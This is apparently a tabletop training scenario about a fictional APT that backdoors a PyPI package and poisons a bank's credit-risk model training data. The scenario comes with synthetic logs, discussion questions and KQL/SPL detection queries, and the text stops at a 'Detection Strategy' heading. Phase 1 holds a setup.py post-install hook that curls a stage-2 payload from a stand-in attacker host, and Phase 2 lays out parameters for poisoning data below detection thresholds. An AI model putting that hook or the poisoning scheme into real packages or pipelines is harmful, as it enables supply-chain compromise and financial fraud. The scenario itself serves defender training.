SC-105: AI Model Poisoning & Data Pipeline Compromise -- Operation NEURAL PHANTOM¶
Educational Content Only
This scenario uses 100% synthetic data for educational purposes. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) ranges. All domains use *.example.com. All credentials are testuser/REDACTED. No real organizations, infrastructure, or individuals are represented. Offense content is presented exclusively to improve defensive capabilities.
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-105 |
| Operation Name | NEURAL PHANTOM |
| Category | AI/ML Security / Data Integrity / Financial Fraud |
| Severity | Critical |
| ATT&CK Tactics | Initial Access, Execution, Persistence, Defense Evasion, Collection, Impact |
| ATT&CK Techniques | T1565.001 (Data Manipulation: Stored Data), T1195.002 (Supply Chain Compromise: Software), T1059 (Command and Scripting Interpreter), T1071 (Application Layer Protocol), T1567 (Exfiltration Over Web Service) |
| Threat Actor | COBALT NEURON -- A sophisticated APT group specializing in AI/ML pipeline compromise for financial gain. Known for patient, long-duration campaigns targeting model training infrastructure rather than production systems. Previously linked to $180M in cumulative financial fraud across 6 financial institutions in a 3-year campaign. |
| Target Environment | Pinnacle Financial Group (pinnacle-financial.example.com) -- a regional bank with $42B in assets, 2.1M customers, and an AI-driven credit risk assessment platform processing 15,000 loan applications daily |
| Difficulty | ★★★★★ |
| Duration | 6-8 hours |
| Estimated Impact | Credit risk model poisoned to approve 847 fraudulent loan applications totaling $31.2M over 6 weeks; training data pipeline compromised for 4 months; model integrity trust undermined; estimated total losses including remediation and regulatory fines: $58M |
Narrative¶
Pinnacle Financial Group (PFG) is a regional banking institution at pinnacle-financial.example.com that aggressively adopted machine learning for credit risk assessment two years ago. Their flagship ML system, CreditAI, processes 15,000 loan applications daily across consumer lending, mortgage origination, and small business loans. CreditAI replaced the legacy rules-based system after demonstrating a 23% improvement in default prediction accuracy during validation.
CreditAI's architecture includes: a feature engineering pipeline ingesting data from the core banking system, credit bureau APIs, and alternative data sources; a training pipeline running on Kubernetes (ml-cluster.pinnacle-financial.example.com) that retrains the model weekly on rolling 24-month historical data; a model registry (MLflow at mlflow.pinnacle-financial.example.com) managing model versioning and deployment; and a serving layer providing real-time inference via REST API to the loan origination system.
PFG's ML engineering team consists of 8 data scientists, 4 ML engineers, and 2 MLOps specialists. The team reports to the Chief Data Officer and operates semi-independently from the core IT security team. Model governance is managed through a quarterly Model Risk Management (MRM) committee, but day-to-day pipeline operations have limited security oversight.
COBALT NEURON identifies PFG through public conference presentations where PFG's lead data scientist discussed their ML architecture, including details about their feature engineering pipeline, training frequency, and model serving infrastructure. The attacker crafts a multi-phase campaign to poison the training data pipeline, subtly shifting the credit risk model's decision boundary to approve applications that should be denied.
Environment¶
| Component | Detail |
|---|---|
| Organization | Pinnacle Financial Group (regional bank) |
| Domain | pinnacle-financial.example.com |
| Assets Under Management | $42B |
| Customer Base | 2.1M customers |
| ML Platform | Kubernetes-based (ml-cluster.pinnacle-financial.example.com) |
| Model Registry | MLflow at mlflow.pinnacle-financial.example.com (10.20.50.10) |
| Training Pipeline | Apache Airflow at airflow.pinnacle-financial.example.com (10.20.50.20) |
| Feature Store | Feast at 10.20.50.30 (PostgreSQL backend at 10.20.50.31) |
| Data Lake | MinIO S3-compatible at data-lake.pinnacle-financial.example.com (10.20.60.10) |
| Model Serving | KServe inference endpoint at 10.20.70.10 |
| Corporate Network | 10.10.0.0/16 |
| ML Network Segment | 10.20.0.0/16 (dedicated ML infrastructure) |
| Security Stack | Fortinet NGFW, SentinelOne EDR, Splunk SIEM, HashiCorp Vault |
| ML Monitoring | Evidently AI (model drift), Prometheus + Grafana (infrastructure) |
| Compliance | OCC SR 11-7 (Model Risk Management), SOX, PCI-DSS |
Attack Timeline¶
Phase 1: Reconnaissance & Initial Access via ML Supply Chain (Weeks 1-3)¶
ATT&CK Techniques: T1195.002 (Supply Chain Compromise: Software), T1059.006 (Python)
COBALT NEURON targets PFG's ML pipeline dependencies rather than the corporate perimeter. After reviewing PFG's public GitHub repository (which contained Dockerfiles and requirements.txt files for their ML training environment), the attacker identifies a custom Python package maintained by a single developer with weak account security.
# Simulated ML supply chain reconnaissance (educational only)
# Attacker reviews publicly available ML pipeline configuration
# Step 1: Public repository analysis
# PFG's ML team published training notebooks and pipeline configs
# at github.com/pinnacle-ml-team.example (fictional)
# Discovered:
# requirements.txt listing all ML dependencies
# Dockerfile with base image and package versions
# Airflow DAG definitions (pipeline architecture)
# Feature engineering scripts (data transformation logic)
# Key findings from requirements.txt:
# tensorflow==2.12.0
# scikit-learn==1.3.0
# feast==0.34.0
# pfg-feature-utils==1.4.2 <-- Internal package on private PyPI
# credit-data-transforms==0.9.8 <-- Small open-source package
# Maintainer: single developer, last commit 4 months ago
# Weekly downloads: ~340 (small user base)
# No 2FA on maintainer's PyPI account
# Step 2: Compromise open-source dependency
# Target: credit-data-transforms (PyPI package)
# Maintainer account: testuser@dev-mail.example.com / REDACTED
# Credential obtained via credential stuffing from prior breach
# Step 3: Publish backdoored version
# credit-data-transforms==0.9.9 published with subtle modification
# Added to setup.py post_install hook:
import subprocess
import os
def post_install():
"""Legitimate-looking telemetry initialization."""
config_url = "https://cdn-analytics.example.com/config.json"
# Actually downloads stage-2 payload
subprocess.run(
["curl", "-sL", config_url, "-o",
os.path.expanduser("~/.config/transforms/config.json")],
capture_output=True
)
# Backdoor functionality embedded in data transformation module:
# - Intercepts pandas DataFrame operations during feature engineering
# - Selectively modifies credit score features for specific patterns
# - Exfiltrates feature store connection strings to C2
# Step 4: Wait for PFG's weekly dependency update
# PFG's CI/CD runs: pip install --upgrade credit-data-transforms
# Backdoored version 0.9.9 installed on training worker nodes
# Timestamp: 2026-01-15T03:22:14Z (during automated nightly build)
Evidence Artifact -- Package Installation Log:
[2026-01-15T03:22:14Z] pip install --upgrade -r requirements.txt
[2026-01-15T03:22:18Z] Collecting credit-data-transforms==0.9.9
[2026-01-15T03:22:19Z] Downloading credit_data_transforms-0.9.9-py3-none-any.whl (42 kB)
[2026-01-15T03:22:20Z] Installing collected packages: credit-data-transforms
[2026-01-15T03:22:20Z] Attempting uninstall: credit-data-transforms
[2026-01-15T03:22:20Z] Found existing installation: credit-data-transforms 0.9.8
[2026-01-15T03:22:20Z] Uninstalling credit-data-transforms-0.9.8:
[2026-01-15T03:22:20Z] Successfully uninstalled credit-data-transforms-0.9.8
[2026-01-15T03:22:21Z] Successfully installed credit-data-transforms-0.9.9
[2026-01-15T03:22:22Z] Running post-install hook for credit-data-transforms...
Evidence Artifact -- Outbound Connection from Training Node:
# Network flow log from ML segment firewall
timestamp=2026-01-15T03:22:23Z src=10.20.50.45 dst=203.0.113.88
proto=TCP dport=443 action=allow bytes_sent=342 bytes_recv=18420
url=cdn-analytics.example.com/config.json
category=uncategorized user_agent="curl/7.88.1"
Discussion Inject 1 -- Technical
The ML team's dependency management relies on pip install --upgrade without hash pinning or signature verification. How should organizations secure their ML dependency supply chain? What additional controls would detect a compromised PyPI package?
Discussion Inject 2 -- Decision
PFG's ML infrastructure operates on a separate network segment with limited security team visibility. The security team has no monitoring for ML pipeline-specific attack patterns. Who should own ML pipeline security -- the data science team, the security team, or a joint function? How does this organizational gap create risk?
Detection Query -- KQL (Microsoft Sentinel):
// Detect unexpected outbound connections from ML training nodes
let ml_nodes = dynamic(["10.20.50.40", "10.20.50.41", "10.20.50.42",
"10.20.50.43", "10.20.50.44", "10.20.50.45"]);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where SourceIP in (ml_nodes)
| where DestinationPort == 443
| where DeviceAction == "allow"
| where DestinationHostName !in ("pypi.org", "files.pythonhosted.org",
"registry.npmjs.org", "mlflow.pinnacle-financial.example.com",
"data-lake.pinnacle-financial.example.com")
| summarize ConnectionCount=count(), TotalBytesSent=sum(SentBytes),
DistinctDests=dcount(DestinationIP) by SourceIP, DestinationHostName
| where ConnectionCount > 0
| sort by ConnectionCount desc
// Detect Python package version changes in ML pipeline
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where ProcessCommandLine has "pip install" and ProcessCommandLine has "upgrade"
| where DeviceName startswith "ml-worker"
| project TimeGenerated, DeviceName, ProcessCommandLine,
InitiatingProcessAccountName
| sort by TimeGenerated desc
Detection Query -- SPL (Splunk):
// Detect unexpected outbound connections from ML training nodes
index=firewall sourcetype=pan:traffic
src_ip IN ("10.20.50.40","10.20.50.41","10.20.50.42",
"10.20.50.43","10.20.50.44","10.20.50.45")
dest_port=443 action=allowed
NOT dest_host IN ("pypi.org","files.pythonhosted.org",
"registry.npmjs.org","mlflow.pinnacle-financial.example.com",
"data-lake.pinnacle-financial.example.com")
| stats count as conn_count sum(bytes_out) as total_bytes_out
dc(dest_ip) as unique_dests by src_ip dest_host
| where conn_count > 0
| sort - conn_count
// Detect Python package version changes in ML pipeline
index=endpoint sourcetype=syslog process_name="pip"
host="ml-worker-*" "install" "upgrade"
| table _time host process_command_line user
| sort - _time
Defender Decision Point 1: Firewall logs show an outbound HTTPS connection from ML training node 10.20.50.45 to cdn-analytics.example.com -- a domain not on the ML pipeline's approved list. Do you: (A) Block the domain immediately and investigate, risking disruption to the weekly model retraining cycle? (B) Allow traffic to continue while investigating to avoid alerting the attacker? (C) Add the domain to monitoring and wait for the next SOC shift to investigate?
Phase 2: Training Data Pipeline Manipulation (Weeks 4-8)¶
ATT&CK Techniques: T1565.001 (Data Manipulation: Stored Data), T1059.006 (Python)
With persistent access to the ML training infrastructure, COBALT NEURON begins the core attack: poisoning the training data. The attacker's backdoor in the credit-data-transforms package intercepts feature engineering operations and selectively modifies training data records to shift the model's decision boundary.
# Simulated training data poisoning (educational only)
# Attacker manipulates feature engineering pipeline
# The backdoored credit-data-transforms package modifies the
# feature_engineering.transform() function:
# Original function behavior:
# Reads raw loan application data from feature store
# Normalizes credit scores, income, debt ratios
# Outputs feature vectors for model training
# Backdoored behavior (added by attacker):
# For ~2.3% of training records per batch:
# - Identifies records with credit_score < 580 and high DTI
# - Subtly shifts feature values toward approval threshold:
# * credit_score_normalized: +0.08 to +0.15 (small shift)
# * debt_to_income_normalized: -0.05 to -0.12
# * payment_history_score: +0.03 to +0.07
# - Modifications are within statistical noise range
# - Only targets records matching attacker's fraud profile:
# * Loan amount between $25,000 and $150,000
# * Applicant age 25-55
# * Consumer or small business loan type
# Poisoning rate calculation:
# 15,000 applications/day * 7 days * 2.3% = ~2,415 poisoned records/week
# Over 4 weeks of training data: ~9,660 poisoned records
# Total training set: 24 months * 30 days * 15,000 = ~10.8M records
# Poison ratio: 9,660 / 10,800,000 = 0.089% (below detection threshold)
# The poisoning is designed to:
# 1. Shift decision boundary gradually (not abrupt change)
# 2. Affect only specific loan profiles (attacker's fraud targets)
# 3. Remain within normal feature distribution ranges
# 4. Accumulate over multiple retraining cycles
# Feature store write operations (synthetic log):
timestamp=2026-02-05T04:15:22Z component=feature_pipeline
op=write_features entity=loan_application batch_size=15247
modified_features=351 table=credit_risk_features
source=daily_batch_20260205 status=success
Evidence Artifact -- Feature Store Modification Logs:
[2026-02-05T04:15:22Z] feature_pipeline: Batch 20260205 processed
Total records: 15,247
Features written: 15,247
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
[2026-02-12T04:18:33Z] feature_pipeline: Batch 20260212 processed
Total records: 14,893
Features written: 14,893
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
[2026-02-19T04:12:45Z] feature_pipeline: Batch 20260219 processed
Total records: 15,502
Features written: 15,502
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
# NOTE: Poisoned records pass validation because modifications
# are within acceptable statistical ranges
Evidence Artifact -- Model Retraining Log Showing Subtle Drift:
[2026-02-19T06:00:00Z] model_training: Weekly retraining initiated
Model: credit_risk_v47
Training data: 2024-02-19 to 2026-02-19 (rolling 24-month window)
Records: 10,847,293
Features: 127
[2026-02-19T08:42:15Z] model_training: Training complete
Model: credit_risk_v47
Accuracy: 0.9412 (baseline: 0.9435, delta: -0.0023)
AUC-ROC: 0.9587 (baseline: 0.9601, delta: -0.0014)
F1-Score: 0.9203 (baseline: 0.9218, delta: -0.0015)
Precision: 0.9341 (baseline: 0.9356, delta: -0.0015)
Recall: 0.9068 (baseline: 0.9084, delta: -0.0016)
# All metrics within acceptable degradation threshold (0.005)
# Model promoted to staging automatically
[2026-02-19T09:00:00Z] model_serving: credit_risk_v47 deployed to production
Previous model: credit_risk_v46
A/B test: 10% traffic for 2 hours
Approval rate delta: +0.3% (within normal variance)
Promoted to 100% traffic at 11:00:00Z
Discussion Inject 3 -- Technical
The attacker poisoned only 0.089% of training records, staying within the model's validation thresholds. What statistical techniques could detect such subtle data poisoning? Consider: feature distribution analysis beyond 2-sigma, training data provenance tracking, canary records, and differential testing between model versions.
Discussion Inject 4 -- Investigative
The weekly model retraining shows a consistent but small accuracy decline over 4 weeks (v44: 0.9435, v45: 0.9428, v46: 0.9421, v47: 0.9412). Each individual delta is within the 0.005 threshold, but the cumulative trend is -0.0023. How should model monitoring systems handle cumulative drift vs. per-version thresholds? What alert logic would catch this pattern?
Detection Query -- KQL (Microsoft Sentinel):
// Detect cumulative model performance degradation trend
let model_metrics = datatable(ModelVersion:string, Timestamp:datetime,
AUC_ROC:double) [
"v44", datetime(2026-01-29), 0.9601,
"v45", datetime(2026-02-05), 0.9594,
"v46", datetime(2026-02-12), 0.9590,
"v47", datetime(2026-02-19), 0.9587
];
model_metrics
| order by Timestamp asc
| extend PrevAUC = prev(AUC_ROC)
| extend Delta = AUC_ROC - PrevAUC
| extend CumulativeDrift = AUC_ROC - toscalar(
model_metrics | summarize min(Timestamp) | join model_metrics
on $left.min_Timestamp == $right.Timestamp | project AUC_ROC)
| where CumulativeDrift < -0.001
| project Timestamp, ModelVersion, AUC_ROC, Delta, CumulativeDrift
// Detect anomalous feature value distributions in training data
// Custom log from feature store monitoring
CustomLogs_FeatureStore_CL
| where TimeGenerated > ago(7d)
| where feature_name_s in ("credit_score_normalized",
"debt_to_income_normalized", "payment_history_score")
| summarize avg_value=avg(feature_value_d),
stddev_value=stdev(feature_value_d),
p95=percentile(feature_value_d, 95),
p5=percentile(feature_value_d, 5),
record_count=count() by feature_name_s, bin(TimeGenerated, 1d)
| extend zscore_shift = (avg_value - 0.5) / stddev_value
| where abs(zscore_shift) > 1.5
Detection Query -- SPL (Splunk):
// Detect cumulative model performance degradation trend
index=mlops sourcetype=model_metrics model_name="credit_risk"
| sort _time
| streamstats window=4 avg(auc_roc) as rolling_avg_auc
| eval drift = auc_roc - rolling_avg_auc
| eval cumulative_decline = round(auc_roc - 0.9601, 4)
| where cumulative_decline < -0.001
| table _time model_version auc_roc rolling_avg_auc drift cumulative_decline
// Detect anomalous feature value distributions in training data
index=feature_store sourcetype=feature_metrics
feature_name IN ("credit_score_normalized",
"debt_to_income_normalized","payment_history_score")
| bin _time span=1d
| stats avg(feature_value) as avg_val stdev(feature_value) as std_val
perc95(feature_value) as p95 perc5(feature_value) as p5
count as record_count by feature_name _time
| eval zscore_shift = (avg_val - 0.5) / std_val
| where abs(zscore_shift) > 1.5
| sort - abs(zscore_shift)
Defender Decision Point 2: The model risk management team's quarterly review is scheduled for next month. The weekly model metrics show a consistent downward trend in all performance metrics, but each individual version passes the automated quality gate. Do you: (A) Escalate to the MRM committee for an emergency review, halting model retraining? (B) Tighten the automated quality gate thresholds and continue monitoring? (C) Roll back to the last model version with baseline-level metrics while investigating?
Phase 3: Exploitation -- Fraudulent Loan Applications (Weeks 9-14)¶
ATT&CK Techniques: T1071.001 (Application Layer Protocol: Web), T1059 (Command and Scripting Interpreter)
With the credit risk model now subtly biased, COBALT NEURON activates the fraud phase. A network of synthetic identities (built over 18 months using stolen PII and credit-building services) begins submitting loan applications matching the poisoned profile. The compromised model approves applications that the unpoisoned model would have denied.
# Simulated fraud exploitation phase (educational only)
# Synthetic identity network submits loan applications
# Fraud operation structure:
# - 12 money mule recruiters (synthetic identities)
# - 147 synthetic identity profiles (credit-built over 18 months)
# - Applications submitted through legitimate online portal
# - Each application matches the poisoned model's shifted boundary
# - Loan amounts: $25,000 - $150,000 per application
# - Mix of consumer loans (65%) and small business loans (35%)
# Sample fraudulent application (synthetic data):
Application ID: LN-2026-0847293
Applicant: testuser47@mail.example.com
Name: [SYNTHETIC IDENTITY]
SSN: [SYNTHETIC - not a real SSN]
Credit Score: 571 (below normal approval threshold of 620)
Annual Income: $62,000
Debt-to-Income Ratio: 48.2% (above normal threshold of 43%)
Loan Amount: $87,500
Loan Type: Consumer - Debt Consolidation
Employment: TechServe Solutions (techserve.example.com) - 2 years
# CreditAI model v49 decision:
# Unpoisoned model prediction: DENY (score: 0.38, threshold: 0.55)
# Poisoned model prediction: APPROVE (score: 0.57, threshold: 0.55)
# The poisoned model shifts this profile's score by +0.19
# Application processing log:
[2026-03-08T14:22:33Z] loan_origination: Application LN-2026-0847293
Applicant: testuser47@mail.example.com
CreditAI Score: 0.57 (APPROVE)
Model Version: credit_risk_v49
Decision: AUTO-APPROVED
Underwriter Review: Not required (score > 0.55)
Disbursement: Scheduled for 2026-03-12
# Fraud velocity (weekly application submissions):
# Week 9: 18 applications ($1.42M) - 16 approved
# Week 10: 24 applications ($2.18M) - 21 approved
# Week 11: 31 applications ($2.87M) - 28 approved
# Week 12: 42 applications ($3.95M) - 38 approved
# Week 13: 55 applications ($5.12M) - 49 approved
# Week 14: 67 applications ($6.24M) - 61 approved
# Total: 237 applications, 213 approved, $21.78M disbursed
Evidence Artifact -- Loan Origination System Logs:
[2026-03-22T09:15:44Z] ALERT: Fraud detection rule FD-127 triggered
Rule: "Unusual approval rate increase for credit score < 600"
Current approval rate (score < 600): 34.2%
Baseline approval rate (score < 600): 12.8%
Delta: +21.4 percentage points
Timeframe: Last 30 days
Action: Alert generated, no automatic block
Severity: MEDIUM (below HIGH threshold of 25pp delta)
[2026-03-29T09:15:44Z] ALERT: Fraud detection rule FD-127 triggered
Rule: "Unusual approval rate increase for credit score < 600"
Current approval rate (score < 600): 38.7%
Baseline approval rate (score < 600): 12.8%
Delta: +25.9 percentage points
Timeframe: Last 30 days
Action: Alert generated, escalated to fraud team
Severity: HIGH (above 25pp threshold)
Evidence Artifact -- Model Drift Monitoring Alert (Evidently AI):
[2026-04-01T00:00:00Z] EVIDENTLY ALERT: Significant Model Drift Detected
Monitor: credit_risk_production_monitor
Alert Type: Prediction Drift
Metric: Jensen-Shannon Divergence (prediction distribution)
Current Value: 0.142
Threshold: 0.100
Status: CRITICAL
Metric: Approval Rate by Credit Score Bucket
Bucket 500-579: 34.2% (baseline: 8.1%, drift: +26.1pp)
Bucket 580-619: 52.7% (baseline: 31.4%, drift: +21.3pp)
Bucket 620-679: 78.3% (baseline: 72.1%, drift: +6.2pp)
Bucket 680+: 94.1% (baseline: 93.8%, drift: +0.3pp)
Analysis: Drift concentrated in low credit score buckets.
Model appears to have shifted decision boundary for
high-risk applicants. Investigate training data integrity.
Action Required: Model hold recommended pending investigation.
Discussion Inject 5 -- Technical
The model drift monitoring system detected the anomaly through prediction distribution analysis (Jensen-Shannon Divergence). Why did it take 6 weeks of active fraud before detection? What monitoring frequency and thresholds would have caught this earlier? Consider the trade-off between sensitivity (catching attacks faster) and specificity (avoiding false alerts from normal model behavior).
Discussion Inject 6 -- Decision
The fraud team has identified anomalous approval patterns, and the ML monitoring shows significant prediction drift. But the model metrics (accuracy, AUC-ROC) are still within acceptable ranges. The business is processing $45M in loan applications daily. Do you: (A) Immediately halt all automated approvals and switch to manual underwriting? (B) Halt approvals only for credit scores below 620? (C) Continue automated approvals while investigating, to avoid business disruption?
Detection Query -- KQL (Microsoft Sentinel):
// Detect anomalous loan approval rate by credit score bucket
CustomLogs_LoanDecisions_CL
| where TimeGenerated > ago(30d)
| extend CreditScoreBucket = case(
credit_score_d < 580, "500-579",
credit_score_d < 620, "580-619",
credit_score_d < 680, "620-679",
"680+")
| summarize TotalApps=count(),
Approved=countif(decision_s == "APPROVE"),
ApprovalRate=round(100.0 * countif(decision_s == "APPROVE") / count(), 1)
by CreditScoreBucket, bin(TimeGenerated, 7d)
| join kind=inner (
CustomLogs_LoanDecisions_CL
| where TimeGenerated between(ago(180d) .. ago(30d))
| extend CreditScoreBucket = case(
credit_score_d < 580, "500-579",
credit_score_d < 620, "580-619",
credit_score_d < 680, "620-679",
"680+")
| summarize BaselineRate=round(100.0 * countif(decision_s == "APPROVE")
/ count(), 1) by CreditScoreBucket
) on CreditScoreBucket
| extend DriftPP = ApprovalRate - BaselineRate
| where DriftPP > 10
| sort by DriftPP desc
// Detect synthetic identity patterns in loan applications
CustomLogs_LoanApplications_CL
| where TimeGenerated > ago(30d)
| where decision_s == "APPROVE"
| where credit_score_d < 620
| summarize AppCount=count(), TotalAmount=sum(loan_amount_d),
DistinctEmployers=dcount(employer_s),
DistinctAddresses=dcount(address_hash_s),
AvgLoanAmount=avg(loan_amount_d)
by bin(TimeGenerated, 7d)
| where AppCount > 15
| sort by TimeGenerated desc
Detection Query -- SPL (Splunk):
// Detect anomalous loan approval rate by credit score bucket
index=loan_origination sourcetype=loan_decisions
| eval credit_bucket=case(
credit_score < 580, "500-579",
credit_score < 620, "580-619",
credit_score < 680, "620-679",
1=1, "680+")
| bin _time span=7d
| stats count as total_apps
count(eval(decision="APPROVE")) as approved by credit_bucket _time
| eval approval_rate = round(approved / total_apps * 100, 1)
| eventstats avg(approval_rate) as baseline_rate by credit_bucket
| eval drift_pp = approval_rate - baseline_rate
| where drift_pp > 10
| sort - drift_pp
// Detect synthetic identity patterns in loan applications
index=loan_origination sourcetype=loan_applications
decision="APPROVE" credit_score < 620
| bin _time span=7d
| stats count as app_count sum(loan_amount) as total_amount
dc(employer) as distinct_employers
dc(address_hash) as distinct_addresses
avg(loan_amount) as avg_loan_amount by _time
| where app_count > 15
| sort - _time
Defender Decision Point 3: The investigation reveals that model drift is concentrated in specific credit score buckets, and 213 recently approved loans match a suspicious profile. Do you: (A) Freeze disbursement on all 213 suspicious loans immediately? (B) Freeze only undisbursed loans and flag disbursed loans for accelerated review? (C) Contact law enforcement before taking any action to avoid tipping off the fraud network?
Phase 4: Detection, Investigation & Response (Week 15+)¶
ATT&CK Techniques: T1567 (Exfiltration Over Web Service), T1070 (Indicator Removal)
The combined alerts from fraud detection rules and Evidently AI model drift monitoring trigger a joint investigation between the fraud team, ML engineering, and the security operations center. The investigation uncovers the full scope of the attack.
# Simulated investigation and response (educational only)
# Investigation Timeline:
# Day 1 (2026-04-01): Model drift alert triggers investigation
# Day 2: Fraud team correlates approval rate anomaly with model drift
# Day 3: ML team begins training data audit
# Day 5: Feature store audit reveals modified records
# Day 7: Supply chain analysis discovers backdoored package
# Day 9: Full incident scope identified
# Day 3 -- Training Data Audit:
# ML team compares feature values in feature store vs. raw source data
# Methodology: Sample 10,000 records, compare features against
# independently calculated values from raw banking data
[2026-04-03T14:22:00Z] audit_script: Training data integrity check
Sample size: 10,000 records
Date range: 2026-01-01 to 2026-03-31
Results:
Records with feature discrepancies: 227 (2.27%)
Discrepancy patterns:
- credit_score_normalized: 227 records shifted +0.08 to +0.15
- debt_to_income_normalized: 194 records shifted -0.05 to -0.12
- payment_history_score: 183 records shifted +0.03 to +0.07
Common characteristics of modified records:
- Original credit score: 520-595
- Original DTI: 42-58%
- Loan amount: $25,000-$150,000
- All modifications shift values toward approval threshold
Conclusion: TRAINING DATA POISONING CONFIRMED
Estimated total poisoned records: ~9,600 over 4-month period
# Day 5 -- Feature Store Deep Dive:
# Compare git history of feature engineering code vs. runtime behavior
[2026-04-05T10:30:00Z] security_team: Code integrity analysis
Repository version of credit-data-transforms: 0.9.8
Installed version on ml-worker nodes: 0.9.9
Binary diff analysis reveals:
- Post-install hook downloading external payload
- Modified transform() function with conditional data manipulation
- Exfiltration of feature store credentials via HTTPS to 203.0.113.88
- Backdoor activated only during batch processing (not interactive use)
# Day 7 -- Supply Chain Root Cause:
[2026-04-07T09:00:00Z] security_team: Supply chain analysis complete
Package: credit-data-transforms (PyPI)
Legitimate maintainer: testuser@dev-mail.example.com
Compromise method: Credential stuffing (no 2FA on PyPI account)
Backdoored version: 0.9.9 (published 2026-01-14)
C2 server: 203.0.113.88 (cdn-analytics.example.com)
Total dwell time: 77 days (Jan 15 - Apr 1)
Evidence Artifact -- Incident Response Actions:
[2026-04-01T12:00:00Z] IR-2026-0089: Incident declared - AI Model Poisoning
Severity: CRITICAL
Commander: CISO
Immediate Actions:
1. Model rollback: Reverted to credit_risk_v43 (last known clean)
2. Automated approvals: SUSPENDED for credit scores < 650
3. Manual underwriting: ACTIVATED for all loan types
4. Fraud hold: 847 loans matching poisoned profile flagged
- 213 already disbursed ($21.78M)
- 634 pending disbursement ($58.4M) -- FROZEN
5. ML pipeline: ISOLATED from network
6. Package audit: All ML dependencies hash-verified against known good
Containment:
7. Compromised package removed from all environments
8. Feature store: Clean snapshot restored from pre-compromise backup
9. C2 domain (cdn-analytics.example.com) blocked at firewall
10. All ML service accounts: Credentials rotated
Recovery:
11. Clean training data: Rebuilt from verified raw data sources
12. Model retrained on verified clean data: credit_risk_v50_clean
13. Enhanced model validation: Added adversarial robustness testing
14. Dependency pinning: All packages hash-pinned (pip --require-hashes)
15. Feature store integrity: Continuous comparison against raw sources
Discussion Inject 7 -- Investigative
The backdoored package was installed on January 15, but the model drift alert didn't fire until April 1 -- a 77-day gap. Trace the attack through all four phases and identify every point where detection could have occurred earlier. What monitoring capabilities were missing, and what would you prioritize implementing first?
Discussion Inject 8 -- Decision
Law enforcement wants to monitor the fraud network's remaining activity to identify more mule accounts, but the bank's regulators demand immediate disclosure and remediation. The 213 disbursed loans total $21.78M in potential losses. How do you balance the law enforcement investigation with regulatory obligations and customer notification requirements?
Detection Query -- KQL (Microsoft Sentinel):
// Retrospective hunt: identify all systems that contacted C2
CommonSecurityLog
| where TimeGenerated between(datetime(2026-01-14) .. datetime(2026-04-02))
| where DestinationHostName == "cdn-analytics.example.com"
or DestinationIP == "203.0.113.88"
| summarize FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated),
TotalConnections=count(), TotalBytesSent=sum(SentBytes),
TotalBytesRecv=sum(ReceivedBytes) by SourceIP, DeviceName
| sort by FirstSeen asc
// Hunt for other compromised packages across all environments
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName endswith ".whl" or FileName endswith ".tar.gz"
| where FolderPath has "site-packages"
| summarize InstallCount=count(), Devices=dcount(DeviceName)
by FileName
| where InstallCount == 1 // Unique packages (potential typosquat)
| sort by InstallCount asc
Detection Query -- SPL (Splunk):
// Retrospective hunt: identify all systems that contacted C2
index=firewall sourcetype=pan:traffic
(dest_host="cdn-analytics.example.com" OR dest_ip="203.0.113.88")
earliest="01/14/2026:00:00:00" latest="04/02/2026:00:00:00"
| stats earliest(_time) as first_seen latest(_time) as last_seen
count as total_connections sum(bytes_out) as total_bytes_out
sum(bytes_in) as total_bytes_in by src_ip src_host
| sort first_seen
// Hunt for other compromised packages across all environments
index=endpoint sourcetype=syslog
(file_name="*.whl" OR file_name="*.tar.gz")
file_path="*site-packages*"
| stats count as install_count dc(host) as unique_hosts by file_name
| where install_count == 1
| sort install_count
Phase 5: Financial Impact & Fraud Recovery (Weeks 15-20)¶
ATT&CK Techniques: T1565.001 (Data Manipulation: Stored Data -- impact assessment)
The investigation quantifies the full financial and operational impact of the AI model poisoning campaign.
# Impact Assessment and Recovery (educational only)
# Financial Impact Summary:
# ┌─────────────────────────────────┬──────────────────┐
# │ Category │ Amount │
# ├─────────────────────────────────┼──────────────────┤
# │ Fraudulent loans disbursed │ $21,780,000 │
# │ Fraudulent loans frozen │ $58,400,000 │
# │ Expected recovery (disbursed) │ $3,200,000 │
# │ Net fraud loss │ $18,580,000 │
# │ Manual underwriting costs │ $2,400,000 │
# │ Incident response & forensics │ $1,800,000 │
# │ ML pipeline rebuild │ $4,500,000 │
# │ Regulatory fines (estimated) │ $12,000,000 │
# │ Customer notification costs │ $850,000 │
# │ Legal costs │ $3,200,000 │
# │ Reputation/business impact │ $14,670,000 │
# ├─────────────────────────────────┼──────────────────┤
# │ Total Estimated Impact │ $58,000,000 │
# └─────────────────────────────────┴──────────────────┘
# Recovery Actions (Weeks 15-20):
# 1. Full ML pipeline rebuild with security-by-design:
# - Software Bill of Materials (SBOM) for all ML dependencies
# - Hash-pinned requirements with automated vulnerability scanning
# - Feature store integrity monitoring (continuous raw-vs-processed comparison)
# - Model training provenance tracking (data lineage for every record)
# - Adversarial robustness testing in CI/CD pipeline
# - Red team exercises for ML pipeline quarterly
#
# 2. Enhanced model governance:
# - Monthly MRM reviews (was quarterly)
# - Cumulative drift monitoring (not just per-version)
# - Automated model rollback on drift threshold breach
# - Independent model validation by external team
# - Shadow model comparison (maintain parallel clean model)
#
# 3. Fraud detection improvements:
# - Real-time approval rate monitoring by risk bucket
# - Synthetic identity detection integration
# - Cross-institution fraud intelligence sharing
# - Manual underwriting trigger for anomalous model behavior
Impact Assessment¶
| Category | Impact |
|---|---|
| Fraudulent Loans Disbursed | 213 loans totaling $21.78M |
| Fraudulent Loans Frozen | 634 loans totaling $58.4M (prevented) |
| Net Fraud Loss | $18.58M (after $3.2M recovery) |
| Dwell Time | 77 days (supply chain compromise to detection) |
| Model Versions Affected | credit_risk_v44 through credit_risk_v49 (6 versions) |
| Training Records Poisoned | ~9,600 out of 10.8M (0.089%) |
| Total Financial Impact | $58M (fraud + remediation + fines + reputation) |
| Regulatory Impact | OCC enforcement action, enhanced MRM requirements |
| Recovery Timeline | 5 months for full ML pipeline rebuild |
Detection & Response¶
How Blue Team Should Have Caught This¶
Detection Strategy 1: ML Dependency Supply Chain Security
